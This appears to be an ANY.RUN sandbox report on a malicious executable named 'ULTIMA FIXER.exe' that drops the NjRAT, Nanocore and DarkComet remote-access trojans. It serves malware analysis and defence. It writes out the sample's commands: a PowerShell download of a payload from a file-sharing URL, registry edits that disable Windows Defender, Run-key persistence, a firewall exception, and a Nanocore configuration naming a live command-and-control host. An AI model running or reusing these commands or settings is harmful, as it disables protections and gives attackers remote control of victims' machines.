File name:

ULTIMA FIXER.exe

Full analysis: https://app.any.run/tasks/dc6b736d-16a4-4b1a-ab91-75883ca32b27
Verdict: Malicious activity
Threats:

DarkComet RAT is a malicious program designed to remotely control or administer a victim's computer, steal private data and spy on the victim.

Malware Trends Tracker     >>>
Analysis date: July 21, 2024, 18:29:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
darkcomet
njrat
bladabindi
nanocore
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

A1B9891034AC4D37A7B1CC50E89DA311

SHA1:

C1C76B120CA3647C084147FDA90E7039373042DA

SHA256:

C96021DBC189AC871841CD06C7CB78FEEEDED68729EEFBFAFF18AD5425F7DB97

SSDEEP:

6144:uxU5xeIqdGkR7Pa9QRIUZvsr6iQ97/3Db4Qu+wB74fc9Kh7lZ4QB:kU5xeB37PkraN/zbfu+wB74fc9Kh7lZV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • ULTIMA FIXER.exe (PID: 3224)
      • powershell.exe (PID: 740)
      • csrss.exe (PID: 3856)
      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)

    • Disables Windows Defender

      • reg.exe (PID: 2960)
      • reg.exe (PID: 540)
      • reg.exe (PID: 2348)
      • reg.exe (PID: 1504)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 3208)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 3208)

    • Changes the autorun value in the registry

      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 1608)
      • csrss.exe (PID: 184)

    • Changes the login/logoff helper path in the registry

      • WINCHECK.EXE (PID: 3092)

    • NjRAT is detected

      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)

    • Create files in the Startup directory

      • csrss.exe (PID: 184)

    • NANOCORE has been detected (YARA)

      • WINDOWS UPDT.EXE (PID: 3080)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • ULTIMA FIXER.exe (PID: 3224)
      • WINCHECK.EXE (PID: 3092)

    • Reads security settings of Internet Explorer

      • ULTIMA FIXER.exe (PID: 3224)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • ULTINJ.EXE (PID: 3936)

    • Executing commands from a ".bat" file

      • ULTIMA FIXER.exe (PID: 3224)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 3208)

    • Reads the Internet Settings

      • ULTIMA FIXER.exe (PID: 3224)
      • powershell.exe (PID: 740)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)
      • ULTINJ.EXE (PID: 3936)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 3208)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 3208)

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 3208)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3208)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 740)
      • csrss.exe (PID: 3856)
      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)

    • Adds/modifies Windows certificates

      • powershell.exe (PID: 740)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 740)
      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)

    • The executable file from the user directory is run by the CMD process

      • csrss.exe (PID: 3856)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3208)

    • Downloads file from URI

      • powershell.exe (PID: 740)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)

    • Starts itself from another location

      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)

    • Reads the date of Windows installation

      • WINCHECK.EXE (PID: 3092)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 3116)
      • cmd.exe (PID: 524)

    • Start notepad (likely ransomware note)

      • csrss.exe (PID: 1608)

    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • csrss.exe (PID: 184)

    • Connects to unusual port

      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 1608)

  • INFO

    • Checks supported languages

      • ULTIMA FIXER.exe (PID: 3224)
      • csrss.exe (PID: 3856)
      • wmpnscfg.exe (PID: 2080)
      • WINDOWS UPDT.EXE (PID: 3080)
      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 1608)
      • csrss.exe (PID: 184)

    • Create files in a temporary directory

      • ULTIMA FIXER.exe (PID: 3224)

    • Reads the computer name

      • ULTIMA FIXER.exe (PID: 3224)
      • wmpnscfg.exe (PID: 2080)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • csrss.exe (PID: 1608)
      • ULTINJ.EXE (PID: 3936)
      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 184)

    • Disables trace logs

      • powershell.exe (PID: 740)

    • Creates files or folders in the user directory

      • csrss.exe (PID: 3856)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 2080)

    • Reads the machine GUID from the registry

      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)

    • Process checks whether UAC notifications are on

      • WINDOWS UPDT.EXE (PID: 3080)

    • Creates files in the program directory

      • WINDOWS UPDT.EXE (PID: 3080)

    • Reads Environment values

      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Nanocore

(PID) Process(3080) WINDOWS UPDT.EXE
BuildTime2024-07-07 19:08:34.420008
Version1.2.2.0
Mutex0408a841-44c1-40dc-87b4-2422bb58fa5d
DefaultGroupDefault
PrimaryConnectionHostjvjv2044duck33.duckdns.org
BackupConnectionHostjvjv2044duck33.duckdns.org
ConnectionPort8808
RunOnStartupTrue
RequestElevationFalse
BypassUserAccountControlFalse
ClearZoneIdentifierTrue
ClearAccessControlFalse
SetCriticalProcessFalse
PreventSystemSleepTrue
ActivateAwayModeFalse
EnableDebugModeFalse
RunDelay0
ConnectDelay4000
RestartDelay5000
TimeoutInterval5000
KeepAliveTimeout30000
MutexTimeout5000
LanTimeout2500
WanTimeout8000
BufferSize65535
MaxPacketSize10485760
GCThreshold10485760
UseCustomDnsServerTrue
PrimaryDnsServer8.8.8.8
BackupDnsServer8.8.4.4
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (64.1)
.dll | Win32 Dynamic Link Library (generic) (15.5)
.exe | Win32 Executable (generic) (10.6)
.exe | Generic Win/DOS Executable (4.7)
.exe | DOS Executable Generic (4.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:50+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 49152
InitializedDataSize: 147456
UninitializedDataSize: 212992
EntryPoint: 0x3f9a0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
75
Monitored processes
31
Malicious processes
9
Suspicious processes
4

Behavior graph

Click at the process to see the details
start ultima fixer.exe cmd.exe no specs cacls.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs sc.exe no specs sc.exe no specs reg.exe no specs wmpnscfg.exe no specs reg.exe no specs powershell.exe csrss.exe reg.exe no specs reg.exe no specs powershell.exe no specs #NJRAT ultinj.exe wincheck.exe #NANOCORE windows updt.exe cmd.exe no specs cmd.exe no specs attrib.exe no specs attrib.exe no specs powershell.exe no specs csrss.exe notepad.exe no specs #NJRAT csrss.exe netsh.exe no specs ultima fixer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
184"C:\Users\admin\AppData\Roaming\csrss.exe" C:\Users\admin\AppData\Roaming\csrss.exe
ULTINJ.EXE
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\appdata\roaming\csrss.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
524"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\admin\AppData\Roaming" +s +hC:\Windows\System32\cmd.exeWINCHECK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
540reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
596reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyApp" /d "C:\Users\admin\AppData\Local\Temp\csrss.exe" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
660netsh firewall add allowedprogram "C:\Users\admin\AppData\Roaming\csrss.exe" "csrss.exe" ENABLEC:\Windows\System32\netsh.execsrss.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
740powershell -Command "Invoke-WebRequest -Uri https://download1323.mediafire.com/1q4kgifhu8pgykFeVB3pqUr-YyH0I5yvzRSURgjXaKV5FOwOthRh5rDQ1HsyQqaKlggn8KIw2CVwgL3fe0zEkL3vDST-NvUjGve5l-f5GqpISbZ6J17STpB0CbfUL7HcgjClYPmvJcxfdRYSI0dyztaVx6xq8xKQuVAEVWNsqahAtA/iw2p62wnaxxm809/csrss.exe -OutFile C:\Users\admin\AppData\Local\Temp\csrss.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
764attrib "C:\Users\admin\AppData\Roaming\WINCHECK.EXE" +s +hC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1044reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1504reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1608"C:\Users\admin\Documents\MSDCSC\csrss.exe" C:\Users\admin\Documents\MSDCSC\csrss.exe
WINCHECK.EXE
User:
admin
Company:
Microsoft Corp.
Integrity Level:
HIGH
Description:
Remote Service Application
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\documents\msdcsc\csrss.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\user32.dll
Total events
21 791
Read events
21 588
Write events
201
Delete events
2

Modification events

(PID) Process:(3224) ULTIMA FIXER.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3224) ULTIMA FIXER.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3224) ULTIMA FIXER.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3224) ULTIMA FIXER.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2960) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
Operation:writeName:DisableAntiSpyware
Value:
1
(PID) Process:(2944) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
Operation:writeName:DisableRealtimeMonitoring
Value:
1
(PID) Process:(540) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
Operation:writeName:DisableBehaviorMonitoring
Value:
1
(PID) Process:(2348) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
Operation:writeName:DisableOnAccessProtection
Value:
1
(PID) Process:(1504) reg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
Operation:writeName:DisableScanOnRealtimeEnable
Value:
1
(PID) Process:(1044) reg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableRegistryTools
Value:
1
Executable files
8
Suspicious files
7
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3224ULTIMA FIXER.exeC:\Users\admin\AppData\Local\Temp\E2AB.tmp\E2AC.tmp\E2AD.battext
MD5:F08DA42187B78D04D21C8498CB0CDA50
SHA256:1633D8B4E65CF51C127FC2222A96EA08E7BBFD0D028F7E712C4E3E7291E1A211
3092WINCHECK.EXEC:\Users\admin\Documents\MSDCSC\csrss.exeexecutable
MD5:C018FE852FFA46A996C7A742E71B1745
SHA256:73977EED3E647ABB02D8C53FD758E2725E78E545643BC01C4002044921A49FA2
740powershell.exeC:\Users\admin\AppData\Local\Temp\nrpjp5u1.yjx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
740powershell.exeC:\Users\admin\AppData\Local\Temp\csrss.exeexecutable
MD5:D110630B6914840324E5B4F8A1867A07
SHA256:2C45376F0C9DB528F1D7593278CE8E4C0372F3B5F0D34BE9FE8E0552784DB120
3080WINDOWS UPDT.EXEC:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\run.dattext
MD5:6F9AD3BE88DE0D7B50729C82E3697155
SHA256:4231BB2160AF64C59AA640B79CDE1F65E69A839EEB7617A74A08538D970E206E
3132powershell.exeC:\Users\admin\AppData\Local\Temp\r25qd13c.p4d.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3856csrss.exeC:\Users\admin\AppData\Roaming\WINDOWS UPDT.EXEexecutable
MD5:15C30B1CA1E7FF0A779C350A19925B94
SHA256:B7358F8AFF742EB85C89D1B7CF57DB1F0842DAB6E576AE68C959522EA6CB01B6
3132powershell.exeC:\Users\admin\AppData\Local\Temp\hrkwzshu.ud3.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
740powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
740powershell.exeC:\Users\admin\AppData\Local\Temp\mwdzk014.yuc.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
11
DNS requests
4
Threats
9

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
whitelisted
1372
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1060
svchost.exe
224.0.0.252:5355
whitelisted
2564
svchost.exe
239.255.255.250:3702
whitelisted
4
System
192.168.100.255:138
whitelisted
740
powershell.exe
205.196.123.11:443
download1323.mediafire.com
MEDIAFIRE
US
unknown
1608
csrss.exe
78.177.68.243:1604
jvjv2044duck33.duckdns.org
Turk Telekom
TR
unknown
3080
WINDOWS UPDT.EXE
78.177.68.243:8808
jvjv2044duck33.duckdns.org
Turk Telekom
TR
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.174
whitelisted
download1323.mediafire.com
  • 205.196.123.11
whitelisted
jvjv2044duck33.duckdns.org
  • 78.177.68.243
malicious

Threats

PID
Process
Class
Message
1060
svchost.exe
Potentially Bad Traffic
ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
1060
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
3080
WINDOWS UPDT.EXE
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1060
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3080
WINDOWS UPDT.EXE
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1060
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1060
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2 ETPRO signatures available at the full report
Process
Message
csrss.exe
C:\Users\admin\AppData\Roaming\ULTINJ.EXE
csrss.exe
C:\Users\admin\AppData\Roaming\WINCHECK.EXE
csrss.exe
C:\Users\admin\AppData\Roaming\WINDOWS UPDT.EXE
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ULTIMA FIXER.exe